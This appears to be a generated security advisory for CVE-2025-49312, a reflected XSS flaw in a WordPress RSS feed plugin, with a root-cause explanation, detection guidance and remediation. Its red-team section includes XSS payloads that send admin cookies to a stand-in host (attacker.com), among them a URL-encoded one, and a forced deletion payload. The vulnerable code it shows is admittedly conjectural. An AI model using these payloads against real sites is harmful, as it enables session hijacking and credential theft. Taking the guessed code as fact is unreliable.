CVE-2025-49312
Executive Summary
CVE-2025-49312 is a reflected Cross-Site Scripting (XSS) vulnerability in the Echo RSS Feed Post Generator Plugin for WordPress by CodeRevolution. The flaw exists in versions up to and including 5.4.8.1, where user-supplied input is not properly neutralized during web page generation. An attacker can craft a malicious URL that, when visited by an authenticated WordPress administrator, executes arbitrary JavaScript in the context of the admin's session. This can lead to session hijacking, credential theft, or forced plugin actions. The vulnerability is classified as WordPress ecosystem issue and does not involve Apache or Nginx.

Supply Chain & Package Security
This is a WordPress plugin distributed via the official WordPress plugin repository. No NPM, PyPI, Go, or Ruby packages are involved. Users should verify plugin integrity via checksums provided by WordPress.org and monitor for official patches from CodeRevolution.
CVSS Breakdown & Threat Level
- CVSS Score: 7.1 (High)
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required (victim must click a crafted link)
- Scope: Changed
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: Low
Threat Level: High. Although the EPSS score is 0.0%, the vulnerability is trivial to exploit and targets a widely used WordPress plugin. Reflected XSS can be chained with other attacks (e.g., CSRF) to escalate privileges.
Deep Dive & Mechanics
The vulnerability resides in the plugin's handling of URL parameters during RSS feed generation. When a user accesses a crafted URL like:
https://victim-site.com/wp-admin/admin-ajax.php?action=echo_rss_feed&url=<script>alert(1)</script>
The plugin reflects the url parameter directly into the HTML response without proper sanitization or output encoding. This allows an attacker to inject arbitrary JavaScript.
Root Cause: The plugin uses echo $_GET['url']; or similar unsanitized output in the response. The lack of esc_url() or wp_kses() functions leads to XSS.
Attack Flow:
- Attacker crafts a malicious URL with JavaScript payload.
- Attacker sends the link to an admin via email, social engineering, or other means.
- Admin clicks the link while authenticated to WordPress.
- The injected script executes in the admin's browser, allowing the attacker to steal cookies, perform actions on behalf of the admin, or redirect to malicious sites.
Vulnerable vs. Patched Code
Vulnerable Code (<= 5.4.8.1):
// In some plugin file (e.g., echo-rss-feed-post-generator.php)
function echo_rss_feed_ajax_handler() {
$url = $_GET['url'];
echo "<div>RSS Feed URL: " . $url . "</div>";
// ... rest of the handler
}
Patched Code (Hypothetical):
function echo_rss_feed_ajax_handler() {
$url = isset($_GET['url']) ? esc_url_raw($_GET['url']) : '';
echo "<div>RSS Feed URL: " . esc_html($url) . "</div>";
// ... rest of the handler
}
The patched version uses esc_url_raw() for URL validation and esc_html() for safe output encoding.
Exploitation & Lab Setup
Red Team (Offensive)
Prerequisites:
- A WordPress instance with Echo RSS Feed Post Generator <= 5.4.8.1 installed and activated.
- A victim admin user session.
Exploit Steps:
- Craft a malicious URL:
http://target-site.com/wp-admin/admin-ajax.php?action=echo_rss_feed&url=<script>document.location='http://attacker.com/steal.php?c='+document.cookie</script> - Encode the payload to avoid filtering:
http://target-site.com/wp-admin/admin-ajax.php?action=echo_rss_feed&url=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.com%2Fsteal.php%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E - Send the link to the victim admin via email or social engineering.
- When the admin clicks, the script executes and sends cookies to attacker's server.
Example Payloads:
- Steal cookies:
<script>new Image().src='http://attacker.com/steal.php?c='+document.cookie</script> - Force plugin action:
<script>window.location='http://target-site.com/wp-admin/admin.php?page=echo-rss-feed&action=delete_all'</script>
Blue Team (Defensive)
Detection:
- Monitor web server logs for requests to
admin-ajax.phpwithaction=echo_rss_feedand suspiciousurlparameters containing<script>or%3Cscript%3E. - Use WAF rules to block reflected XSS patterns in query strings.
Hunting:
- Search for
echo_rss_feedin access logs and look for unusualurlvalues. - Check for outbound connections from the WordPress server to unknown IPs on port 80/443.
Lab Setup:
- Use a local WordPress installation with Docker:
docker run -d -p 8080:80 --name wp-xss wordpress:latest - Install the vulnerable plugin manually from the WordPress repository (version 5.4.8.1).
- Simulate attack using curl:
curl "http://localhost:8080/wp-admin/admin-ajax.php?action=echo_rss_feed&url=<script>alert(1)</script>"
Indicators of Compromise (IOCs)
- Network:
- HTTP requests to
/wp-admin/admin-ajax.phpwithaction=echo_rss_feedandurlparameter containing<script>or encoded script tags. - Outbound connections to attacker-controlled domains from the WordPress server.
- HTTP requests to
- File:
- Modified plugin files (e.g.,
echo-rss-feed-post-generator.php) with injected code. - Suspicious entries in WordPress
wp_optionstable related to the plugin.
- Modified plugin files (e.g.,
- Log:
- Web server logs showing repeated requests to
admin-ajax.phpwithaction=echo_rss_feedand non-standardurlvalues.
- Web server logs showing repeated requests to

Remediation & Mitigation
Immediate Actions:
- Disable the plugin until an official patch is released.
- Implement a Web Application Firewall (WAF) rule to block requests containing
action=echo_rss_feedwith suspiciousurlparameters. - Educate administrators not to click on untrusted links while logged into WordPress.
Long-term Fix:
- Apply the official patch from CodeRevolution when available.
- If no patch is forthcoming, consider replacing the plugin with an alternative RSS feed generator.
- For developers: ensure all user input is sanitized with
esc_url_raw()and output encoded withesc_html()orwp_kses().
Workaround:
- Add the following to
.htaccessto block direct access to the vulnerable endpoint:RewriteEngine On RewriteCond %{QUERY_STRING} action=echo_rss_feed [NC] RewriteRule ^ - [F,L]
